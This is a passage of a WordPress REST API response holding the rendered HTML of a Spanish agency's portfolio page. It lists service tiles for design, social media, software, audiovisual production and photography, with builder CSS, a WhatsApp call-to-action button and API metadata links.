\"portfolio-item-cats-inner-wrap\"><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Dise\u00f1o Grafico<\/span><span> &middot; <\/span><span>Web<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/diseno-grafico\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"D-Grafico\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/D-Grafico.jpg\" alt=\"dise\u00f1o grafico publicitario\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Dise\u00f1o Gr\u00e1fico<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Logos<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/redes-sociales\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Redes-Sociales\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Redes-Sociales.jpg\" alt=\"gestion de redes sociales\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Redes Sociales<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Dise\u00f1o Grafico<\/span><span> &middot; <\/span><span>Ventas<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/software-a-la-medida\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Software\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Software.jpg\" alt=\"desarrollo de software\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Software a la medida<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Branding<\/span><span> &middot; <\/span><span>Ventas<\/span><span> &middot; <\/span><span>Web<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/produccion-audiovisual\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Audiovisual\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Audiovisual.jpg\" alt=\"videos corporativos\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Producci\u00f3n Audiovisual<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Audiovisual<\/span><span> &middot; <\/span><span>Branding<\/span><span> &middot; <\/span><span>Ventas<\/span><span> &middot; <\/span><span>Web<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/fotografia\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Fotografia\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Fotografia.jpg\" alt=\"fotografia profesional\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Fotograf\u00eda<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Audiovisual<\/span><span> &middot; <\/span><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Ventas<\/span><span> &middot; <\/span><span>Web<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><div class=\"element be-hoverlay not-wide no-wide-width-height  c_to_c\"style=\"margin-bottom: 50px;\" data-category-names = \"\"><div class=\"element-inner\" style=\"margin-left: 50px;\"><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/motion-graphics\/\" class=\" thumb-wrap   \" data-gdpr-atts={} title=\"Redes-Sociales\" ><div class=\"flip-wrap\" ><div   style = \"padding-bottom : 62.5%;background-color:rgba(245,245,245,1);\" class=\"flip-img-wrap\"><img decoding=\"async\" src=\"https:\/\/jansmedia.com\/wp-content\/uploads\/2017\/05\/Redes-Sociales.jpg\" alt=\"gestion de redes sociales\"\/><\/div><\/div><div class=\"thumb-overlay \"><div class=\"thumb-bg \" style=\"background:rgba(255,255,255,1)\"><div class=\"thumb-title-wrap \"><div class=\"thumb-title \" style=\"color:rgba(18,18,18,1);\"><div class = \"thumb-title-inner-wrap\">Motion Graphics<\/div><\/div><div class=\"portfolio-item-cats \" style=\"color:rgba(117,117,117,1);\"><div class = \"portfolio-item-cats-inner-wrap\"><span>Audiovisual<\/span><span> &middot; <\/span><span>Branding<\/span><span> &middot; <\/span><span>Campa\u00f1as<\/span><span> &middot; <\/span><span>Ventas<\/span><span> &middot; <\/span><span>Videos<\/span><\/div><\/div><\/div><\/div><\/div><\/a><\/div><\/div><\/div><\/div><\/div><\/div><\/div><div class = \"tatsu-column-bg-image-wrap\"><div class = \"tatsu-column-bg-image\" ><\/div><\/div><\/div><style>.tatsu-row > .tatsu-fuhatlm56yaksuyw.tatsu-column{width: 100%;}.tatsu-fuhatlm56yaksuyw.tatsu-column > .tatsu-column-inner > .tatsu-column-overlay{mix-blend-mode: none;}.tatsu-fuhatlm56yaksuyw > .tatsu-column-inner > .tatsu-top-divider{z-index: 9999;}.tatsu-fuhatlm56yaksuyw > .tatsu-column-inner > .tatsu-bottom-divider{z-index: 9999;}.tatsu-fuhatlm56yaksuyw > .tatsu-column-inner > .tatsu-left-divider{z-index: 9999;}.tatsu-fuhatlm56yaksuyw > .tatsu-column-inner > .tatsu-right-divider{z-index: 9999;}@media only screen and (max-width:1377px) {.tatsu-row > .tatsu-fuhatlm56yaksuyw.tatsu-column{width: 100%;}}@media only screen and (min-width:768px) and (max-width: 1024px) {.tatsu-row > .tatsu-fuhatlm56yaksuyw.tatsu-column{width: 100%;}}@media only screen and (max-width: 767px) {.tatsu-row > .tatsu-fuhatlm56yaksuyw.tatsu-column{width: 100%;}}<\/style><\/div><\/div><\/div><\/div><div class=\"tatsu-section-background-wrap\"><div class = \"tatsu-section-background\" ><\/div><\/div><style>.tatsu-By-eeBQKIm .tatsu-section-pad{padding: 40px 0px 180px 0px;}.tatsu-By-eeBQKIm > .tatsu-bottom-divider{z-index: 9999;}.tatsu-By-eeBQKIm > .tatsu-top-divider{z-index: 9999;}<\/style><\/div><div  class=\"tatsu-fuhcv4c7vj305jdu tatsu-section    tatsu-clearfix\" data-title=\"\"  data-headerscheme=\"background--dark\"><div class='tatsu-section-pad clearfix' data-padding='{\"d\":\"0px 0px 90px 0px \"}' data-padding-top='0px'><div class=\"tatsu-row-wrap  tatsu-wrap tatsu-row-one-col tatsu-row-has-one-cols tatsu-medium-gutter tatsu-reg-cols  tatsu-clearfix tatsu-fuhcv4c81kbviw9w\" ><style>.tatsu-fuhcv4c81kbviw9w > .tatsu-row{margin-top: -175px;}.tatsu-fuhcv4c81kbviw9w.tatsu-row-wrap > .tatsu-row{margin-bottom: 0px;}@media only screen and (max-width: 767px) {.tatsu-fuhcv4c81kbviw9w.tatsu-row-wrap > .tatsu-row{padding: 50px 15px 50px 15px ;}}<\/style><div id = \"footer-cta\" class=\"tatsu-row \" ><div  class=\"tatsu-column  tatsu-one-col tatsu-animate tatsu-column-image-none tatsu-column-effect-none  tatsu-fuhcv4c89afuv02u\" data-animation=\"fadeInUp\"   data-parallax-speed=\"0\" style=\"\"><div class=\"tatsu-column-inner \" ><div class=\"tatsu-column-pad-wrap\"><div class=\"tatsu-column-pad\" ><div  class=\"tatsu-module tatsu-inline-text clearfix tatsu-fuhcv4c8emg9ikzk   \" ><style>.tatsu-fuhcv4c8emg9ikzk .tatsu-inline-text-inner{width: 100%;text-align: left;}<\/style><div class=\"tatsu-inline-text-inner tatsu-align-center\">\n<h2 style=\"text-align: center\"><strong><span style=\"color: #ffffff\">The future is exciting<br \/>Lets shape it together<\/span><\/strong><\/h2>\n<\/div><\/div><div  class=\"tatsu-module tatsu-normal-button tatsu-button-wrap align-block block-center  tatsu-fuhcv4c9es9enmnb   \"><a class=\"tatsu-shortcode smallbtn tatsu-button left-icon circular   bg-animation-none  \" href=\"https:\/\/wa.link\/njtyy2\" style= \"\"  aria-label=\"???? hablemos en Whatsapp\" data-gdpr-atts={} target=\"_blank\">???? hablemos en Whatsapp<\/a><style>.tatsu-fuhcv4c9es9enmnb .tatsu-button{background-color: rgba(0,187,45,1);color: rgba(255,255,255,1) ;border-width: 2px;border-color: rgba(255,255,255,1); box-shadow: 0px 35px 40px -20px rgba(0,0,0,0.65);}<\/style><\/div><\/div><\/div><div class = \"tatsu-column-bg-image-wrap\"><div class = \"tatsu-column-bg-image\" ><\/div><\/div><\/div><style>.tatsu-row > .tatsu-fuhcv4c89afuv02u.tatsu-column{width: 100%;}.tatsu-fuhcv4c89afuv02u.tatsu-column > .tatsu-column-inner{background-color: rgba(0,197,232,1);border-radius: 10px;}.tatsu-fuhcv4c89afuv02u.tatsu-column > .tatsu-column-inner > .tatsu-column-pad-wrap > .tatsu-column-pad{padding: 40px 70px 40px 70px;}.tatsu-fuhcv4c89afuv02u.tatsu-column > .tatsu-column-inner > .tatsu-column-overlay{mix-blend-mode: none;}.tatsu-fuhcv4c89afuv02u > .tatsu-column-inner > .tatsu-top-divider{z-index: 9999;}.tatsu-fuhcv4c89afuv02u > .tatsu-column-inner > .tatsu-bottom-divider{z-index: 9999;}.tatsu-fuhcv4c89afuv02u > .tatsu-column-inner > .tatsu-left-divider{z-index: 9999;}.tatsu-fuhcv4c89afuv02u > .tatsu-column-inner > .tatsu-right-divider{z-index: 9999;}.tatsu-fuhcv4c89afuv02u.tatsu-column > .tatsu-column-inner > .tatsu-column-bg-image-wrap > .tatsu-column-bg-image{border-radius: 10px;}@media only screen and (max-width:1377px) {.tatsu-row > .tatsu-fuhcv4c89afuv02u.tatsu-column{width: 100%;}}@media only screen and (min-width:768px) and (max-width: 1024px) {.tatsu-row > .tatsu-fuhcv4c89afuv02u.tatsu-column{width: 100%;}}@media only screen and (max-width: 767px) {.tatsu-row > .tatsu-fuhcv4c89afuv02u.tatsu-column{width: 100%;}.tatsu-fuhcv4c89afuv02u.tatsu-column > .tatsu-column-inner > .tatsu-column-pad-wrap > .tatsu-column-pad{padding: 80px 10px 80px 10px ;}}<\/style><\/div><\/div><\/div><\/div><div class=\"tatsu-section-background-wrap\"><div class = \"tatsu-section-background\" ><\/div><\/div><style>.tatsu-fuhcv4c7vj305jdu .tatsu-section-background{background-image: url(https:\/\/jansmedia.com\/wp-content\/uploads\/2021\/04\/new-york-city-street-night-lights.jpg);background-repeat: no-repeat;background-attachment: scroll;background-position: center center;background-size: cover;}.tatsu-fuhcv4c7vj305jdu .tatsu-bg-blur{background-repeat: no-repeat;background-attachment: scroll;background-position: center center;background-size: cover;}.tatsu-fuhcv4c7vj305jdu .tatsu-section-pad{padding: 0px 0px 90px 0px ;}.tatsu-fuhcv4c7vj305jdu > .tatsu-bottom-divider{z-index: 9999;}.tatsu-fuhcv4c7vj305jdu > .tatsu-top-divider{z-index: 9999;}<\/style><\/div>\n","protected":false},"excerpt":{"rendered":"<p><a href=\"https:\/\/jansmedia.com\/index.php\/portfolio\/motion-graphics\/\" class=\"more-link style1-button\">Read More<\/a><\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3788","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/pages\/3788","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/comments?post=3788"}],"version-history":[{"count":20,"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/pages\/3788\/revisions"}],"predecessor-version":[{"id":4353,"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/pages\/3788\/revisions\/4353"}],"wp:attachment":[{"href":"https:\/\/jansmedia.com\/index.php\/wp-json\/wp\/v2\/media?parent=3788"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}